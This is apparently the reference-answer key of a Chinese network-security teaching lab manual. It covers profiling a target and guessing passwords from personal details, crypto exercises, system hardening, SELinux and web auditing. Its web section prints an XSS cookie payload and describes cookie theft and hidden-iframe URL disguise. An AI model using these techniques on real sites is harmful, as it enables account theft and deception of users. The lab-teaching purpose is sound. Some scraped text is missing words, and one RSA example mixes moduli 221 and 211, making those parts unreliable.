




版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
網(wǎng)絡信息安全教學實驗系統(tǒng)實驗教程〔參考答案〕./實驗教程<V3.2>〔參考答案〕TeachingExperimentalSystemofNetworkandInformationSecurity##中軟吉大信息技術##.網(wǎng)絡信息安全教學實驗系統(tǒng)實驗教程〔參考答案〕目錄知識類實驗1實驗1敏感信息搜集1練習一敏感信息搜集1實驗3密碼心理學攻擊3練習一密碼心理學攻擊3實驗5古典密碼算法4練習一Caesar密碼4練習二單表置換密碼4實驗6對稱密碼算法5練習二AES算法5練習四RC4算法5實驗7非對稱密碼算法6練習一RSA算法6練習二ELGamal算法6實驗8Hash算法7練習一MD5算法7練習二SHA1算法7實驗9密碼應用9練習一文件安全傳輸9實驗10PKI技術11練習一證書應用11實驗11信息隱藏12練習一信息隱藏位圖法12練習二LSB水印算法12練習三DCT水印攻擊13實驗12系統(tǒng)安全14練習一Windows2003系統(tǒng)安全14任務一用戶權限管理14任務二審核策略設置14任務三注冊表安全設置15任務四TCP/IP篩選15任務五主機安全加固16練習二LinuxFC5系統(tǒng)安全17任務一權限模型17任務二安全訪問21任務三SELinux23實驗14Web安全25練習一Web腳本攻擊25任務一XSS腳本攻擊25練習二web服務器安全設置26任務一IIS安全設置26任務二Apache安全設置26練習三日志審計27練習四網(wǎng)絡事件審計28實驗15數(shù)據(jù)庫安全30練習一SQL注入30實驗16軟件安全32練習一軟件漏洞利用32實驗17協(xié)議脆弱性分析33練習一SNMP協(xié)議脆弱性分析33實驗18安全協(xié)議34練習一IPSec-IP安全協(xié)議34練習二SSL-安全套接層協(xié)議34實驗19信息搜集36練習一信息搜集36練習二主機發(fā)現(xiàn)37任務一ARP主機發(fā)現(xiàn)37練習三端口掃描37任務一TCP端口掃描37任務二UDP端口掃描37實驗20漏洞掃描38練習二模擬攻擊方法38練習三Web漏洞掃描器38實驗21網(wǎng)絡嗅探39練習二原始套接字嗅探器39練習三Winpcap嗅探器39實驗22緩沖區(qū)溢出40練習一緩沖區(qū)溢出攻擊40練習二本地緩沖區(qū)溢出40任務一利用跳轉指令實現(xiàn)緩沖區(qū)溢出40任務二定位參數(shù)地址實現(xiàn)緩沖區(qū)溢出40任務三緩沖區(qū)溢出實現(xiàn)用戶權限提升41練習三遠程溢出與后門植入41實驗23拒絕服務攻擊42練習一洪泛攻擊42練習三Smurf攻擊42實驗24欺騙攻擊44練習一ARP欺騙44練習二ICMP重定向45實驗25網(wǎng)絡后門47練習一shell后門47練習二無端口后門47實驗26特洛伊木馬49練習一網(wǎng)頁木馬49練習二Webshell49練習三ARP木馬與ARP防火墻50練習五木馬免殺51練習六跳板52實驗27防火墻53練習一Windows2003防火墻應用53練習二iptables應用53實驗28入侵檢測58練習一基于網(wǎng)絡入侵檢測系統(tǒng)58練習二NIDS與防火墻聯(lián)動60練習三NIDS開發(fā)61練習四自建實用IDS62實驗29VPN64練習三利用OpenVPN構建企業(yè)VPN64實驗30蜜罐蜜網(wǎng)65練習一蜜罐引入65練習四自制蜜罐65練習五蜜網(wǎng)仿真66實驗31引導區(qū)病毒67練習一DOS引導區(qū)病毒67實驗32文件型病毒68練習一PE病毒68實驗33宏病毒70練習一Word宏病毒70實驗34腳本病毒72練習一Java腳本病毒72練習二VB腳本病毒72實驗35型病毒73練習一Outlook病毒73實驗36蠕蟲病毒74練習一蠕蟲仿真74實驗37病毒行為分析75練習一病毒行為分析75實驗38文件恢復77練習一FAT32文件恢復77練習二Ext2文件恢復78實驗39RAID磁盤陣列80練習一RAID基礎80練習二RAID應用80實驗41Wi-Fi基礎應用82練習三AP橋模式82課題類實驗83實驗2主動防御安全網(wǎng)關的架設83實驗3部署多DMZ區(qū)的安全企業(yè)網(wǎng)絡92.知識類實驗實驗1敏感信息搜集練習一敏感信息搜集表1-1-1可能具有利用價值的信息性別男生日6月21血型B生肖兔星座雙子座省份##城市##表1-1-2可能具有利用價值的信息真實朋友王建表1-1-3可能具有利用價值的信息目標##X磊目標學校魯東大學表1-1-4可能具有利用價值的信息##X磊性別男手機leileiaideni126生日6月21血型B生肖兔星座雙子座省份##城市##大學名稱魯東大學大學入學年份2006大學院系機械學院大學班級0603班中學名稱####第一中學中學班級03級8班中學畢業(yè)年份20##實驗3密碼心理學攻擊練習一密碼心理學攻擊二.實驗流程〔4〕將成功破解到的結果填入表3-1-2中:表3-1-2賬戶密碼host1zhangleiHost219870621Host3Host4zhanglei123Host5zl0621Host6leileiaideni實驗5古典密碼算法練習一Caesar密碼一.手動完成Caesar密碼〔1〕對應明文:datasecurityhasevolvedrapidly的密文:__GDWDVHFXULWBKDVHYROYHGUDSLGOB_.練習二單表置換密碼二.單表置換密碼分析〔2〕在密文中出現(xiàn)頻率最高的字母是__A__.與上表比較,它可能是由字母__E__置換的.AbcdefghijklmCHINABDEFGJKLNopqrstuvwxyzMOPQRSTUVWXYZ.實驗6對稱密碼算法練習二AES算法二.AES算法ByteSub變換:ShiftRow變換:練習四RC4算法二.RC4算法1.手動模擬RC4加密〔1〕實例化后的S_Box是:<0x01,0x00,0x07,0x05,0x02,0x04,0x08,0x06,0x03>.〔2〕加密后的密文數(shù)字序列是〔0x49,0x67,0x6D,0x64,0x6F,0x22,0x55,0x46,0x32,0x23〕..實驗7非對稱密碼算法練習一RSA算法一.RSA生成公鑰與加密解密過程演示〔7〕根據(jù)實驗原理中對RSA加密算法的介紹,當素數(shù)P=13,素數(shù)q=17,私鑰d=143時,寫出RSA公鑰的生成過程:n=p*q=13*17=221z=<p-1>*<q-1>=12*16=192e=d-1<modz>=143-1<mod192>=47利用生成的公鑰,寫出對明文m=40的加密過程〔加密過程計算量比較大,請使用工具箱的RSA工具進行計算〕:c=me<modn>=4047<mod211>=105利用私鑰d=143,對生成的密文進行解密:m=cd<modn>=105143<mod211>=40練習二ELGamal算法一.ELGamal生成公鑰與加密解密過程演示〔4〕根據(jù)實驗原理中對ELGamal加密算法的介紹,當素數(shù)P=311,本原元素g=136,私鑰X=3時,寫ELGamal公鑰的成生過程:y=gx<modp>=1363<mod311>=88利用生成的公鑰,寫出對明文m=40,隨機數(shù)x=2的加密過程:C1=gx<modp>=1362<mod311>=147k=yx<modp>=882<mod311>=280C2=<k*m><modp>=<280*40><mod311>=4利用私鑰X=3,對生成的密文進行解密:k=C1X<modp>=1473<mod311>=280k-1=10m=<k-1*C2><modp>=<10*4><mod311>=40.實驗8Hash算法練習一MD5算法二.MD5算法請寫出第2輪第1步的運算過程以與經(jīng)過運算后的變量.運算過程:MD5第二輪的邏輯函數(shù)為:G<x,y,z>=<x&z>|<y&~z>MD5第2輪的操作程序為:GG<A,B,C,D,M[k],S,T[i]>它表示的邏輯為:A←B+<<A+G<B,C,D>+M[k]+T[i]><<<S><DAEAB5EF&91D9BEE8>|<2E87BDD9&~91D9BEE8>=BECEB5F9所以,邏輯函數(shù)值為:BECEB5F9DAEAB5EF+<<2B480E7C+BECEB5F9+31323334+F61E2562><<<5>=E7CE5760將得到的結果E7CE5760寫入變量A,運算完成.運算后的變量:A:E7CE5760B:DAEAB5EFC:2E87BDD9D:91D9BEE8練習二SHA1算法二.SHA1算法請寫出第21步的運算過程以與經(jīng)過運算后的變量.運算過程:SHA1的操作程序如下:SHA1第21步的邏輯函數(shù)為:ft=B⊕C⊕DSHA1第21步的操作程序為:A=<A<<<5>+ft<B,D,C>+E+Wt+KtB=AC=B<<<30D=CE=Df21=61E7F48C⊕C04BD57B⊕8279FF1E=A=<39669B34<<<5>+23D5DEE9+4E85FC91+E7CBEB94+6ED9EBA1=F5D51936B=39669B34C=61E7F48CD=C04BD57BE=8279FF1E計算完成.運算后的變量:A:F5D51936B:39669B34C:1879FD23D:C04BD57BE:8279FF1E.實驗9密碼應用練習一文件安全傳輸實驗操作步驟設計:以實驗組主機A〔發(fā)送方〕和主機B〔接收方〕為例,設計的實驗步驟如下.〔1〕主機A與主機B協(xié)商實驗中用到的加密算法:DES〔對稱加密算法〕、RSA〔非對稱加密算法〕和MD5〔哈希函數(shù)〕;〔2〕主機A、B進入"密碼工具〞|"加密解密〞|"RSA加密算法〞|"公鑰〞頁面,生成各自的公私鑰對,并將公鑰通告給對方;〔3〕主機A在目錄"D:\work\SecComm〞下新建文本文件"安全通信.txt〞.主機A進入"密碼工具〞|"加密解密〞|"DES加密算法〞|"加密/解密〞頁面,自定義明文與64位密鑰,在這里明文m為"Springishere〞〔引號內(nèi)〕,會話密鑰k為"jlcss_ok〞〔引號內(nèi)〕,單擊"加密〞按鈕完成加密操作,將得到的密文復制到"安全通信.txt〞文件中;〔4〕主機A進入"MD5哈希函數(shù)〞頁面,將明文m〔與DES加密的是同一個明文〕輸入到文本框中,將生成的十六進制摘要復制到"RSA加密算法〞的"加密/解密簽名/驗證簽名〞頁面明文框中,用自己的私鑰對摘要進行加密,并將加密結果復制到"安全通信.txt〞新行中;〔5〕主機A打開"RSA加密算法〞的"加密/解密〞頁面,在"明文〞框中輸入會話密鑰k,用主機B的公鑰對明文進行加密,將加密結果復制到"安全通信.txt〞新行中.最終"安全通信.txt〞的文件內(nèi)容類似下圖;「說明」上圖從上至下第一部分是DES加密密文;第二部分是主機A的數(shù)字簽名;第三部分是對DES密鑰〔會話密鑰〕的加密密文.〔6〕主機A將該文件以附件的形式發(fā)送給主機B.主機B接收,并將"安全通信.txt〞文件保存至"D:\work\SecComm〞目錄中.〔7〕主機B打開文件"安全通信.txt〞,將上圖所示的第三部分復制到"RSA加密算法〞的"加密/解密〞頁面密文框中,使用自己的私鑰解密得到的明文就是會話密鑰k’;〔8〕主機B進入"DES加密算法〞的"加密/解密〞頁面,使用會話密鑰k’對上圖所示的第一部分進行解密,得到明文m’;〔9〕主機B對明文m’進行md5哈希計算,得到明文摘要;〔10〕主機B進入"RSA加密算法〞的"簽名/驗證簽名〞頁面,使用主機A的公鑰對上圖所示的第二部分〔主機A的數(shù)字簽名〕進行簽名驗證得到明文摘要,將其與自己計算得到的明文摘要進行對比,若相同則表明文件安全通信成功..實驗10PKI技術練習一證書應用安全Web通信1.單向認證<僅服務器需要身份認證>〔3〕服務器下載、安裝由CA頒發(fā)的證書證書信息描述:無法將這個證書驗證到一個受信任的證書頒發(fā)機構.頒發(fā)者:CA.查看其是否存在不存在.服務器下載、安裝CA根證書證書信息描述:保證遠程計算機的身份.頒發(fā)者:CA.查看其是否存在存在..實驗11信息隱藏練習一信息隱藏位圖法一.分析BMP圖像文件頭和信息頭分析BMP圖像文件頭和信息頭,表11-1-2內(nèi)容表11-1-2整個文件的大小00240036h=2359350字節(jié)從文件開始到圖像數(shù)據(jù)區(qū)之間的偏移量54字節(jié)每個像素的位數(shù)24位壓縮類型0:不壓縮圖像數(shù)據(jù)的大小2359350-54=2359296字節(jié)練習二LSB水印算法一.嵌入并提取水印<1〕pic1.bmp文件大小2359296字節(jié),其最多可以嵌入589818字節(jié)數(shù)據(jù).watermark.bmp的文件摘要是:6F67B30549D4A86C053AFD9FD7498F82<3〕再次查看pic1.bmp文件大小2359296字節(jié),對比嵌入前后圖像大小變化情況沒有變化.<5〕計算提取的水印文件摘要:6F67B30549D4A86C053AFD9FD7498F82,對比這個水印文件摘要內(nèi)容與之前watermark.bmp文件摘要,結果一致二.LSB水印算法源碼答案:參見應用服務器中源碼答案11-2.練習三DCT水印攻擊一.嵌入并提取水印<1〕watermark.jpg文件摘要是:089F7B4920BD0CE8E4DEC84970E1C496.<4〕計算提取的水印文件的文件摘要:089F7B4920BD0CE8E4DEC84970E1C496..實驗12系統(tǒng)安全練習一Windows2003系統(tǒng)安全任務一用戶權限管理二.權限的四項基本原則演示1.拒絕優(yōu)先原則〔5〕訪問結果:拒絕訪問.2.權限最小原則〔1〕默認情況下用戶test2隸屬組為:Users.〔2〕操作結果:拒絕修改.3.權限繼承原則〔4〕訪問結果:test31用戶可以完全訪問;test32用戶只可以讀取.4.權限累加原則〔5〕證實test4用戶對此目錄擁有的權限?test4用戶對此目錄有讀取、寫入、執(zhí)行的權限.三.NTFS分區(qū)上分配磁盤配額〔3〕記錄文件大小超過5M時的情況系統(tǒng)給出提示.任務二審核策略設置一.設置并驗證"審核對象訪問〞2.a(chǎn)udit目錄文件審核〔5〕系統(tǒng)的審核事件序列是:560、567、562.解釋序列事件:允許〔權限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關的權限〔WriteData〕;已關閉對象句柄〔c:\audit\general.txt〕.〔6〕系統(tǒng)的審核事件序列是:560、560、567、560、567、562__.解釋序列事件:允許〔權限X圍內(nèi)〕訪問已存在對象c:\audit\新建文本文檔.txt;允許〔WriteData〕訪問已存在對象c:\audit;已使用與句柄相關的權限〔WriteData,即文件重命名由"新建文本文檔.txt到"general.txt〞〕;允許〔權限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關的權限〔WriteData,C:\audit\general.txt文件寫操作〕;關閉對象c:\audit\general.txt句柄.〔7〕系統(tǒng)的審核事件序列是:560、567、562、560、567、562、560、567、562.解釋序列事件:允許〔ReadData〕訪問已存在對象c:\audit;已使用與句柄相關的權限〔ReadData,c:\audit〕;關閉對象c:\audit句柄;允許〔權限X圍內(nèi)〕訪問已存在對象c:\audit\general.txt;已使用與句柄相關的權限〔ReadData〕;關閉對象c:\audit\general.txt句柄;允許〔ReadData〕訪問已存在對象c:\audit;已使用與句柄相關的權限〔ReadData,c:\audit〕;關閉對象c:\audit句柄.任務三注冊表安全設置一.注冊表安全設置5.防火墻TTL主機類型探測〔1〕查看返回TTL值128.〔2〕查看本機TTL值110.任務四TCP/IP篩選一.端口篩選〔4〕訪問結果:無法顯示網(wǎng)頁.〔6〕此時主機A的Netcat提示信息是:主機A的Netcat提示信息是:connectto[主機A的IP]from主機B的主機名稱[主機B的IP]主機B的連接端口.任務五主機安全加固一.漏洞掃描與測試1.漏洞掃描 表12-1-1檢測報告表系統(tǒng)類型Windows2003開放端口與服務〔端口/服務〕端口服務21ftp23telnet80www135epmap139netbios-ssn445microsoft-ds系統(tǒng)用戶Administrator;Guest;IUSER_HOST;IWAM_HOST;student;SUPPORT_388945a0;test;zzzz2.漏洞測試〔3〕在主機B的D盤下新建名稱為"jlcss〞的文件夾,命令為mkdirjlcss.通知主機B查看D盤是否出現(xiàn)名為"jlcss〞的文件夾是.〔4〕主機A打開IE瀏覽器,在地址欄中輸入"ftp://主機B的IP地址〞,能否訪問能.二.安全加固實施2.關閉ipc$空連接出現(xiàn)提示:發(fā)生系統(tǒng)錯誤64.指定的網(wǎng)絡名不再可用.3.禁用NetBIOS出現(xiàn)提示:Hostnotfound.4.關閉445端口〔2〕此時445端口是否開啟否.5.禁止Telnet服務.主機A重新telnet主機B,出現(xiàn)提示不能打開到主機的連接,在端口23:連接失敗.6.禁止ftp服務主機B的21端口是否關閉?是主機A通過ftp訪問主機B,結果如何?無法與服務器建立連接三.加固測試表12-1-2加固測試檢測報告對比項加固前加固后掃描時間系統(tǒng)當前時間系統(tǒng)當前時間漏洞數(shù)量50警告數(shù)量150提示數(shù)量287是否發(fā)現(xiàn)安全漏洞是否是否檢測到NetBIOS信息是否練習二LinuxFC5系統(tǒng)安全任務一權限模型一.用戶賬戶操作1.添加用戶〔1〕執(zhí)行命令:useradd-d/home/user1-s/bin/bashuser1.執(zhí)行命令:passwduser1. 〔2〕執(zhí)行命令:useradd-d/home/user2-s/bin/shuser2.執(zhí)行命令:passwduser2.〔3〕執(zhí)行命令:vim/etc/passwd.查看結果如下:user1:x:502:502::/home/user1:/bin/bash.user2:x:503:503::/home/user2:/bin/sh.〔4〕允許user1或user2寫操作的目錄有:①目錄所有者非user和user2,文件訪問權限為所有人可寫.如/etc、/tmp目錄.②目錄所屬組為user1或user2組,文件訪問權限為屬組可寫.③目錄所有者為user1或user2,文件訪問權限為所有者可寫.如/home/user1或/home/user2.2.添加用戶組 〔1〕執(zhí)行命令:groupadd-g601newgroup1.〔2〕執(zhí)行命令:groupadd-g602newgroup2.〔3〕執(zhí)行命令:vim/etc/group.查看結果如下:newgroup1:x:601:.newgroup2:x:602:.3.添加用戶附加組 〔1〕執(zhí)行命令:usermod-Gnewgroup1,newgroup2user1. 〔2〕執(zhí)行命令:usermod-Gnewgroup1,newgroup2user2.〔3〕執(zhí)行命令:vim/etc/group.查看結果如下:newgroup1:x:601:user1,user2.newgroup2:x:602:user1,user2.4.用戶組刪除用戶 〔1〕執(zhí)行命令:gpasswd-duser1newgroup1. 〔2〕執(zhí)行命令:gpasswd-duser2newgroup2.〔3〕執(zhí)行命令:vim/etc/group.查看結果如下:newgroup1:x:601:user2.newgroup2:x:602:user1.5.刪除用戶 〔1〕執(zhí)行命令:userdel-ruser1. 〔2〕執(zhí)行命令:userdel-ruser2.〔3〕執(zhí)行命令:vim/etc/passwd.〔4〕執(zhí)行命令:vim/etc/group.查看結果如下:newgroup1:x:601:.newgroup2:x:602:.6.刪除用戶組〔1〕執(zhí)行命令:groupdelnewgroup1.〔2〕執(zhí)行命令:groupdelnewgroup2.二.文件訪問權限1.表12-2-1gzip文件屬性文件數(shù)1文件所有者root文件屬組root文件大小〔字節(jié)〕299464最后訪問時間略表12-2-2gzip文件訪問權限文件所有者文件屬組其它用戶讀取可讀可讀可讀寫入可寫不可寫不可寫執(zhí)行可執(zhí)行可執(zhí)行可執(zhí)行2.修改文件訪問權限〔1〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guest.〔2〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guestgnome-terminal2.chmodo-xgnome-terminal2或chmod754gnome-terminal2.〔3〕gnome-ternimal2沒有執(zhí)行成功;因為guest用戶沒有執(zhí)行權限.〔4〕執(zhí)行命令:chgrpguestgonme-terminal2或chown:guestgonme-terminal2此時文件gnome-terminal2的權限位為:rw表示:-rwxr-xr--.代碼表示:754.〔5〕成功;因為gnome-terminal2文件屬組為guest,guest用戶對該文件有執(zhí)行權限.3.設置默認權限〔1〕默認文件訪問權限是0022,將其翻譯為rw表示為:-rwxr-xr-x.〔2〕mask值為0037.〔3〕執(zhí)行命令:cp/usr/bin/gnome-terminal/home/guest.4.特殊權限位〔1〕〔第一次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功不成功.為什么只有root用戶〔文件擁有者〕對code文件擁有寫權限,以guest用戶執(zhí)行writecode對code文件進行寫操作權限不夠.〔第二次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功成功.為什么setuid權限位可以讓一般用戶在執(zhí)行程序時,能夠使執(zhí)行用戶暫時擁有文件所有者的權限,即guest用戶對writecode擁有了root的權限.〔2〕code文件的訪問權限:root用戶只讀,root組用戶可寫,其它用戶只讀.writecode文件的訪問權限:root用戶讀、寫、執(zhí)行,root組用戶讀、執(zhí)行,其它用戶讀、執(zhí)行.〔第一次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功不成功.為什么此時只有root組用戶才可對code文件進行寫操作.〔第二次〕在guest用戶控制臺中執(zhí)行writecode,code文件是否寫入成功成功.為什么setgid權限位可以讓一般用戶在執(zhí)行程序時,能夠使執(zhí)行用戶暫時擁有文件所屬組的權限,即guest用戶對writecode用戶擁有了root組的權限.任務二安全訪問一.使用xinetd實施主機訪問控制1.telnet服務的參數(shù)配置〔2〕telnet監(jiān)聽端口23.telnet服務守護進程名xinetd.〔3〕表12-2-3xinetd-telnet配置項啟動xinetd服務時是否自動打開telnet服務disable=notelnet服務使用的數(shù)據(jù)傳輸方式socket_type=stream執(zhí)行telnet服務的用戶user=root啟動telnet服務所使用的命令wait=no登錄不成功時日志記載的信息log_on_failure+=USERID〔4〕記錄追加的配置項:no_access=同組主機IP.〔5〕登錄不成功;因為本機已經(jīng)拒絕同組主機訪問本機的telnet服務.〔6〕記錄追加的配置項:per_source=2.重啟xinetd服務命令:servicexinetdrestart.〔7〕登錄成功次數(shù)為2.同組主機繼續(xù)嘗試登錄:成功.〔8〕注釋掉pre_source項.禁止系統(tǒng)提供telnet服務,命令:disable=yes.二.使用TCPWrappers實施主機訪問控制〔4〕同組主機嘗試遠程登錄、FTP登錄當前主機.登錄不成功.〔5〕請同實驗組其它主機遠程登錄、FTP登錄當前主機.登錄成功.〔6〕添加規(guī)則內(nèi)容為ALL:ALL.登錄狀況:不成功.〔7〕規(guī)則內(nèi)容為:in.telnetd:同組主機IPvsftpd:同組主機IP〔8〕/var/log/tcp-wrappers日志中的信息格式:星期;月;日期;時間;CST;年;同組主機IP.三.使用SSH安全通信〔2〕主機間是否為明文傳輸是;可否捕獲到telnet登錄口令可以.2.FTP傳輸?shù)牟话踩则炞C〔1〕記錄輸入的明文內(nèi)容略.〔2〕Snort命令:·/snort-devsrc本機IPorsrc同組主機IP.3.SSH遠程登錄〔3〕Snort命令:·/snort-devsrc本機IPorsrc同組主機IP.〔5〕SSH服務器版本號OpenSSH4.3.捕獲到的客戶端登錄口令:登錄口令捕獲不到.主機間信息傳輸是否安全:安全〔密文傳輸〕.4.SCP遠程文件復制〔1〕Snort命令:·/snort-devsrc本機IPorsrc同組主機IP.〔3〕捕獲到的客戶端登錄口令:登錄口令捕獲不到.文件拷貝是否安全,為什么?安全;因為傳輸信息是密文傳輸.5.修改SSH服務為xinetd啟動 〔2〕停止sshd服務,命令:/etc/init.d/sshdstop. 〔3〕重啟xinetd服務,命令:servicexinetdrestart. 〔4〕查看sshd服務端口對應的進程:netstat-natp查看對應的進程名稱為xinetd. 〔5〕同組主機訪問SSH服務:可以成功訪問ssh服務.任務三SELinux一.增強Apache服務安全〔1〕在/opt目錄下新建目錄virdir,具體命令是:mkdir/opt/virdir.〔2〕重新啟動d服務,具體命令是:servicedrestart.〔3〕頁面訪問信息為:openfilefailed.分析產(chǎn)生該結果的原因:apache系統(tǒng)用戶對test.php文件無寫權限.〔4〕操作方法:chownapache:apache/opt/virdir.頁面訪問信息為writefilesuccess!.〔5〕查看虛擬目錄安全上下文:無.〔6〕操作方法:vim/etc/selinux/config.〔7〕頁面訪問信息為openfilefailed.分析產(chǎn)生該結果的原因:apache服務進程d的安全domain為_t,此域僅能夠讀被賦予d_sys_content_t標簽的文件.〔8〕頁面訪問信息為writefilesuccess!.解釋上述原因:虛擬目錄與目錄內(nèi)包含的文件擁有了d_sys_content_t標簽.二.增強Mysql數(shù)據(jù)庫安全〔1〕啟動mysqld服務.servicemysqldstart.〔3〕mv/var/lib/mysql/test/opt.〔4〕vim/etc/selinux/config.〔5〕mv/opt/test/var/lib/mysql.查看test、mysql目錄安全上下文,具體命令是:ls-dZ目錄名.二者的安全上下文分別是:system_u:object_r:usr_t.system_u:object_r:mysqld_db_t.〔6〕操作是否成功?否.〔7〕操作方法:chcon-R-tmysqld_db_t/var/lib/mysql/test.〔8〕操作是否成功?成功.mysql服務進程mysqld的安全domain〔域〕:mysqld_db_t.mysqld安全域?qū)А瞞ysqld_db_t〕標簽的文件具有讀寫權限..實驗14Web安全練習一Web腳本攻擊任務一XSS腳本攻擊一.認識XSS2.對DOM技術的利用〔1〕結果該頁面利用DOM技術中的document.URL對象取出name參數(shù)后面的字符串username,然后用document.write函數(shù)將其顯示到網(wǎng)頁中.〔2〕代碼<script>alert<document.cookie></script>將被插入到當前的網(wǎng)頁中,瀏覽器直接執(zhí)行了這段代碼后,就會將用戶的cookie信息直接顯示出來,XSS攻擊發(fā)生了.二.盜取cookie〔1〕這說明父頁在一定條件下能夠控制子頁的某些行為.〔3〕這段代碼主要是將盜取的cookie保存至主機A服務器的cookie.txt文件中.〔6〕訪問地址為://主機A的IP:9090/xss.html.三.腳本攻擊〔StoredXSS〕〔3〕主機B用test賬號訪問自己主機中的論壇,并來到mymodify.asp頁面,觀察效果,效果為網(wǎng)頁彈出了主機A中的index.html頁面.四.DOM-BasedXSS挖掘〔3〕實驗效果為:網(wǎng)頁中被插入了asptroy.asp頁面.〔4〕主機A與同組人一起討論應如何利用該漏洞將iframe中的width與heigh數(shù)值設置為0,隱藏插入的惡意網(wǎng)頁,并將構造的URL腳本部分進行轉碼,偽裝URL,使用該URL進行欺騙攻擊.練習二web服務器安全設置任務一IIS安全設置一.搭建IIS服務器3.創(chuàng)建FTP站點主機B打開IE瀏覽器,登錄主機A的FTP站點"ftp://主機A的IP地址:7777〞并嘗試對"A的文本文檔.txt〞進行讀取/寫入/修改/刪除等操作,查看哪種操作成功.只有讀取成功.二.身份驗證和權限設置2.FTP站點的身份驗證和權限設置主機B此時是否可以將寫好的文本文件復制到FTP站點內(nèi)?可以.任務二Apache安全設置一.熟悉Apache配置〔1〕Apache的文檔根目錄/var/www/html.〔2〕該Apache的文檔根目錄可以使用哪些特性OptionsIndexesFollowSymLinks;AllowOverrideNone;Orderallow,deny;allowfromall..〔3〕訪問本機test目錄,觀察訪問結果可以成功訪問,列出該目錄下的所有文件名.再次訪問本機test目錄,觀察訪問結果提示Forbidden,禁止訪問.對比以上兩種現(xiàn)象,說明Indexes選項的作用與其在實際應用中的意義Indexes選項可以控制在訪問目錄時果然沒有默認主頁是否顯示該目錄下的所有文件,在實際應用中可以防止黑客掃描該服務器上的所有網(wǎng)頁.〔4〕訪問本機頁面"文檔根目錄/test/one.html〞,觀察訪問結果NotFound.再次訪問本機test目錄,觀察訪問結果成功訪問到one.html中的內(nèi)容.對比兩次現(xiàn)象,說明采用Apache的AuthConfig模型的作用與其在實際應用中的意義:__AuthConfig模型,可以在目錄級別控制訪問權限,在實際應用中可以限制某個目錄需要授權才能訪問_.二.制作CGI頁面〔1〕修改/var/www/cgi-bin目錄下的first.cgi文件,輸出當前機器的網(wǎng)絡狀態(tài)〔ifconfig〕,訪問該頁面.修改/var/www/cgi-bin目錄下的"first.cgi〞文件:在該頁面中的<HTML>和</HTML>之間添加"ifconfig〞語句.〔2〕在cgi-bin目錄下創(chuàng)建second.cgi文件,用于顯示"使用者發(fā)出request的遠端IP地址〞,訪問該頁面.在cgi-bin目錄下創(chuàng)建"second.cgi〞文件:在該頁面中的<HTML>和</HTML>之間添加"echo$REMOTE_ADDR〞語句.三.創(chuàng)建用戶目錄 〔1〕記錄user用戶主目錄的訪問權限r(nóng)wxr-xr-x. 〔2〕在user用戶主目錄下創(chuàng)建目錄public_html,記下public_html目錄的訪問權限r(nóng)wxr-xr-x,此目錄上user用戶的文檔主目錄.練習三日志審計一.Web日志審計2.訪問無權限和不存在的網(wǎng)頁〔3〕參考實驗原理部分的自定義錯誤類型,這個錯誤代碼代表的錯誤消息是禁止訪問:客戶端的IP地址被拒絕.〔5〕參考實驗原理部分的自定義錯誤類型,這個錯誤代碼代表的錯誤消息是文件或目錄未找到.3.分別自定義日志格式〔2〕舉例說明日志格式:2008-01-0306:14:140.掃面的日期為20XX01月03日.二.FTP日志審計1.匿名登錄FTP服務器〔2〕操作是否成功?不成功.〔5〕操作是否成功?不成功.〔7〕本機再次將文件upload.txt上傳至同組主機FTP服務器,是否成功?成功.2.用戶登錄FTP服務器〔2〕登錄都能否成功?最后一次登錄成功.練習四網(wǎng)絡事件審計一.概要事件審計〔5〕本機提供的、FTP、TELNET服務端口號分別為80、21、23.二.詳細事件審計1.Web事件審計〔4〕同組主機在與應用服務器進行數(shù)據(jù)通信前,首先發(fā)生的網(wǎng)絡行為是建立連接.同組主機所使用的協(xié)議版本/1.1;請求方法是GET.應用服務器使用的Web服務器類型Apache/.在服務器的狀態(tài)響應中:成功建立后,服務器首先返回的狀態(tài)碼是200;服務器返回的內(nèi)容類型是image/jpeg.2.FTP事件審計〔2〕本機通過NetAudit查看客戶端向服務器發(fā)送用戶名的命令與參數(shù)是USERanonymous.FTP服務器的響應狀態(tài)代碼是:331.本機通過NetAudit查看客戶端向服務器發(fā)送密碼的命令與參數(shù)是PASSIEUser.FTP服務器的響應狀態(tài)代碼是:230.同組主機在本地創(chuàng)建文本文件a.txt,文件內(nèi)容任意,然后此文件復制到FTP服務器上.本機通過NetAudit查看客戶端向服務器發(fā)送的命令與參數(shù)是STORa.txt,在文件傳送完成后FTP服務器的響應狀態(tài)代碼是:226.同組主機將FTP服務器上的文件a.txt的文件名修改為b.txt.本機通過NetAudit查看客戶端向服務器發(fā)送的命令與參數(shù)是RNFRa.txtRNTOb.txt,在文件操作完成后FTP服務器的響應狀態(tài)代碼是:250.同組主機將FTP服務器上的文件b.txt復制到本地.本機通過NetAudit查看客戶端向服務器發(fā)送的命令與參數(shù)是RETRb.txt,在文件操作完成后FTP服務器的響應狀態(tài)代碼是:226.同組主機將FTP服務器上的文件b.txt刪除.本機通過NetAudit查看客戶端向服務器發(fā)送的命令與參數(shù)是DELEb.txt,在文件操作完成后FTP服務器的響應狀態(tài)代碼是:250.3.SMTP事件審計〔3〕發(fā)送方與服務器的25端口建立連接.連接成功后,服務器返回響應代碼220.發(fā)送方使用命令MAILFROM將發(fā)送方的地址發(fā)送給服務器.操作成功后服務器返回響應代碼250.發(fā)送方使用命令RCPTTO將接收方的地址發(fā)送給服務器.操作成功后服務器返回響應代碼250.發(fā)送方使用命令DATA告知服務器即將開始向服務器上傳數(shù)據(jù).服務器返回響應代碼354告知發(fā)送方可以開始數(shù)據(jù)的傳輸,傳輸完成后以".〞結束.在數(shù)據(jù)傳輸成功后,發(fā)送方使用命令QUIT退出與服務器的連接.服務器返回響應代碼221關閉連接.4.POP3事件審計〔3〕接收方與服務器的110端口建立連接.連接成功后服務器返回狀態(tài)碼+OK表示連接成功.連接成功后接收方使用命令USER和PASS向服務器發(fā)送用戶名和密碼登錄服務器.登錄成功后接收方使用命令STAT請求的統(tǒng)計資料.操作成功后服務器返回狀態(tài)碼和清單+OK數(shù)總字節(jié)數(shù).接收方使用命令RETR請求下載由參數(shù)標識的信息.服務器返回相應的狀態(tài)碼和.獲取后接收方使用命令DELE請求